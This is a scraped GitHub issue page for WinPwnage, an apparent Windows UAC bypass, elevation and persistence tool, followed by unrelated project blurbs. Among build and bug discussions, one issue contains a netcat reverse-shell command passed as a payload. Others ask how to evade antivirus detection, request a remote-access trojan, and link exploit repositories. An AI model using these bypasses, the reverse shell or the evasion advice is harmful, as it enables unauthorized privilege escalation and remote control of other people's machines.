rootm0s blog
rootm0s / winpwnage Goto Github PK
View Code? Open in Web Editor NEWUAC bypass, Elevate, Persistence methods
UAC bypass, Elevate, Persistence methods
rootm0s blog
This is a task on #19 Can you please try out this locallly and tune it to your preferences?
Once it is the right stuff, we can add it into #41.
usage: argparse_hack.py [-h]
{scan,use} {uac,persist,elevate,execute}
[function_number] [target]
positional arguments:
{scan,use} 'scan' shows information and 'use' applies a function
{uac,persist,elevate,execute}
function_number 'use' only: function ID in the function group
target 'use' only: filepath to the target
optional arguments:
-h, --help show this help message and exit
#!/usr/bin/env python3
import argparse
def parse_the_args():
scan_or_use = ("scan", "use")
choices = "uac persist elevate execute".split()
parser = argparse.ArgumentParser()
parser.add_argument("scan_or_use", choices=scan_or_use,
help="'scan' shows information and 'use' applies a function")
parser.add_argument("function_group", choices=choices)
parser.add_argument("function_number", default=0, type=int, nargs="?",
help="'use' only: function ID in the function group")
parser.add_argument("target", default="C:windows\\system32\\cmd.exe", nargs="?",
help="'use' only: filepath to the target")
print("=" * 10)
parser.print_help()
print("=" * 10)
for verb in scan_or_use:
for choice in choices:
print(verb, choice, 1)
print(parser.parse_args([verb, choice, "1"]))
# Should exit with error
print(parser.parse_args([]))
if __name__ == '__main__':
parse_the_args()
Perhaps it would be a good idea to add a command to the end of the .travis.yml file that runs the app.
sc start testserv
sc stop testserv
sc delete testserv
from admin to system privilege(non interactive)
you should at first convert cpp to python.
here is some Vulnerability:
https://github.com/WindowsExploits/Exploits
https://github.com/hfiref0x/CVE-2015-1701
https://github.com/SecWiki/windows-kernel-exploits
i see the code seem still on python 2, correct me if i am wrong
Thx ๐
Function elevate_mofcomp.py is currently broken.
Sometimes it spawns an elevated process and sometimes it doesn't. The automatic clean-up is also broken at the moment.
Will patch this in near future.
Sometimes WinPwnage quits after successfully executing payload, so it skips the cleaning part.
[!] Attempting to run id (20) configured with payload (['c:\\windows\\system32\\cmd.exe', '/c', 'mspaint.exe'])
[+] Successfully created Default and DelegateExecute key containing payload (c:\windows\system32\cmd.exe /c mspaint.exe )
[!] Disabling file system redirection
[+] Successfully disabled file system redirection
[!] Waiting for wsreset.exe to finish, this can take a few seconds
Exits while it's supposed to wait for it to finish. The payload get's still executed once wsrest.exe is done with all the work.
Seems to happen on different functions as well. Not sure why it happens yet!
so instead of using the cli, im using python code
i can successfully bypass a single executable, but I cant bypass two within the same script which makes me believe [without looking at the code] that there code that is telling it to exit, as python code does not normally exit the script without the dev specifically telling it to do so, so I am kinda wondering about this
this project is awesome! btw :D
from time import sleep
from winpwnage.functions.uac.uacMethod4 import uacMethod4
f1 = r"C:\Users\nubonix\sandboxie\sandboxie.exe"
f2 = r"C:\Users\nubonix\Desktop\WinPwnage\dist\cli\cli.exe"
uacMethod4([f1])
sleep(30) # after various re-trials of trying to get more than one executable to be bypassed within the same script/program, this was my sanity check
uacMethod4([f2])
Hello and thank you for the useful tool!
I would like to ask for clarification concerning the --payload
parameter. The help output indicates it is possible to pass parameters to the payload.
When I do .\winpwnage.exe -u uac -i 3 -p "c:\windows\temp\nc.exe -e powershell.exe 192.168.178.10 3333"
, I get the error that the payload is invalid. I can guess why, because it tries to find an executable named like the fully quoted string.
But when I do .\winpwnage.exe -u uac -i 3 -p c:\windows\temp\nc.exe -e powershell.exe 192.168.178.10 3333
, without the quotes, winpwnage aborts because it tries to interpret the -e
option by its own.
How does passing parameters to the payload work in this case? And how is it even possible to distinguish payload parameters from further payloads? (The latter question arises because --payload
is defined with nargs="+"
.)
ok i gone through those articles but seems not getting to find anyone helpful. how can someone reproduce this in non python installed environment?
How do i make this a exe? I want to still tinker around with the python code but how do i turn it into a exe afterwards?
Says it all, windows defender able to stop almost every usable way in windows 10 1703
Hi,
Here is another way for bypassing uac => https://www.activecyber.us/activelabs/windows-uac-bypass
I put it here to remember it, if you don't have time, I will take a look on it but right now, I have no time sorry :)
why when using schtasks.exe bypass in uac4, we can't elevate with windows service in elevate6?
other uac bypasses can run elevate6.
On Travis CI Windows environments, running python build.py install raises:
error: bundle-files 1 not yet supported on win64
Is there a way to successfully complete the build process?
can i ask for some help with modifying something?
Travis-ci tests fails with python3, help needed!
Issue:
https://travis-ci.com/github/rootm0s/WinPwnage/jobs/306780696
Failures easy.install (exited -1) - Error while running 'C:\ProgramData\chocolatey\lib\easy.install\tools\chocolateyInstall.ps1'. See log for details. The command "choco install pip" failed and exited with 127 during .
Documentation:
https://chocolatey.org/packages/pip#install
I'm trying to convert this project to exe file with pyinstaller --onefile winpwnage.py
command
the process was complete successfully , but when execute the exe file in dist folder not thing is happen, and there is no output to screen
Is there something more interesting that we could do at the end of the automated test?
We currently just run the four -scans but is there some -use commands as well?
https://github.com/rootm0s/WinPwnage/blob/master/.travis.yml#L84-L88
python winpwnage.py -scan -uac
python winpwnage.py -scan -persist
python winpwnage.py -scan -elevate
python winpwnage.py -scan -execute
which of this UAC techniques bypass if UAC set to ALWAYS NOTIFY?
like in core.winstructures
class LUID(Structure):
_fields_ = [('LowPart', DWORD),
('HighPart', LONG)]
When [-] is printed then WinPwnage should not exit with 0. This will signal the calling script that a failure has occurred.
[-] Technique not compatible with this system.
The command "$RUN_WINPWNAGE -use -uac 1 /c/windows/system32/cmd.exe" exited with 0.
Elevate from Administrator to SYSTEM using named pipe impersonation is currently broken when using python 3:
Feel free to send PR if you want to help! ๐
Traceback (most recent call last):
File "winpwnage.py", line 4, in
from winpwnage.core.scanner import scanner, function
File "/home/xubuntu/tools/WinPwnage/winpwnage/core/scanner.py", line 1, in
from winpwnage.functions.uac.uac_runas import *
File "/home/xubuntu/tools/WinPwnage/winpwnage/functions/uac/uac_runas.py", line 2, in
from winpwnage.core.utils import *
File "/home/xubuntu/tools/WinPwnage/winpwnage/core/utils.py", line 7, in
import winreg as _winreg
File "/usr/local/lib/python2.7/dist-packages/winreg/init.py", line 6, in
from _winreg import *
ImportError: No module named _winreg
This tool is detected by antivirus
how can i encoding this tool for anti detect?
for example persistMethod4
doesn't support using exe with params.
but persistMethod5
and persistMethod6
supports exe with params.
Hi could you add the cmstp privesc pls?
Hello, many of the UAC elevations are blocked(by WinDefender), but that's not an issue, but the 12th function is real bad. It blocks changing the specific registry key, but other than that leaves it there resulting in explorer not working correctly. The regKey gets written with null and clicking any folder in explorer now spawns a new empty window.
This is just FIY if anyone has a problem with explorer after messing with this.
Hi folks, great project--thank you for making this happen.
I would like to potentially use this project as part of my own side project, as well, but as it stands software without a license cannot be copied, reused, modified or distributed legally. If this is intentional, please feel free to close the issue; otherwise, I suggest an open source license such as the MIT License be used.
what are command for persistence and execution techniques?
Can I get CASPER:socket based rat? As its been removed...
The to-do list:
sys.argv[]
calls from main.py
and use argparse instead (Fixed in: 7de4146)winpwnage.py
in README to main.py
Can we use this module for installation of an app like notepad++ as admin without uac prompt in a standard account. Or can we pass the username and password to install exe apps in a machine silently...
I tried using UAC bypass 4. Intitially, it said it could not find the schtasks executable. To fix this, I used os.system instead of the process method you made. Still, all that happens is you see a working cursor. No payload is spawned.
They are all free for Open Source projects like this one.
https://github.com/marketplace/category/continuous-integration
how can i make it so when i click the exe it open the command prompt and runs a pre-specified command? instead of opening cmd and writing "winpwnage.exe --use uac --id 2 --payload start cmd /k whoami" but instead i just click the exe and it does that for me?
after above cleanup, the windows will go to problem in its environment. so some of the windows features won't work because they don't have %windir%
value in environment.
don't remove registry value or key.
you should write its real value in the registry after you got access by this way.
not just this method, you should apply this fix for all registry methods
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.